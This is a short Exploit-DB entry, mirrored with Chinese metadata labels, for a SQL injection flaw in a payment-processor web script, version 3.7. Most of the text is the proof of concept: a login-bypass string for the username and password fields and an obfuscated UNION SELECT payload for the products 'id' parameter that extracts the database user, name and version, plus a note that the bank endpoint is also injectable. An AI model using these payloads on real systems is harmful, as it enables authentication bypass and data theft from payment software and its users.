Enterprise Edition Payment Processor Script 3.7 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-09-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42713/
  • # # # # # 
    # Exploit Title: Enterprise Edition Payment Processor Script 3.7 - SQL Injection
    # Dork: N/A
    # Date: 14.09.2017
    # Vendor Homepage: https://www.goterhosting.com/
    # Software Link: https://www.goterhosting.com/payment-processor-script.php
    # Demo: http://www.enterprise-edition.gvmhosting.com/
    # Version: 3.7
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    # 
    # Proof of Concept: 
    # 
    # 
    # http://localhost/[PATH]/login
    # 
    # User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
    # 
    # http://localhost/[PATH]/products?id=[SQL]&action=update
    # 
    # -1++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,/*!00002CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+-&action=update
    # 
    # http://localhost/[PATH]/bank?id=[SQL]&action=update
    # 
    # Etc..
    # # # # #